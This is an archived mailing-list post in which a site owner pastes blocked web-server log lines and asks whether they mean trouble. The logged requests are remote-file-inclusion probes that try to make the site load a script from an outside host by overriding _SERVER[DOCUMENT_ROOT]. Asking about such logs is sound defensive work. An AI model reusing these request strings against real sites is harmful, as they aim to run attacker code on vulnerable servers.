[BlueOnyx:08490] Making sense of log files...

Wayne Michael wrmichael at hotmail.com
Fri Sep 16 08:11:33 PET 2011


Typically I haven't taken the time to monitor all my log files. 

but recently I've been paying more attention to them. 

this is the log from dfix:

Warning: Blocking 210.127.253.246
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 301 - "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:38 -0400] "GET /?p=1693////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 24991 "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:40 -0400] "GET /?_SERVERDOCUMENT_ROOT=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 21696 "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:05 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 301 - "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:06 -0400] "GET /?_SERVERDOCUMENT_ROOT=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 21696 "-" "Mozilla/5.0"
www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:24 -0400] "GET /?p=1693////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 24991 "-" "Mozilla/5.0"



Not really sure what it means other than it blocked the IP address. 

?p=1693 is a valid link on my site,  does that mean this is the page they tried to take over and they are coming from hackorea ? 

anything to worry about? 

Thanks,

Wayne


 		 	   		  
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.blueonyx.it/pipermail/blueonyx/attachments/20110916/846372be/attachment-0003.html>


More information about the Blueonyx mailing list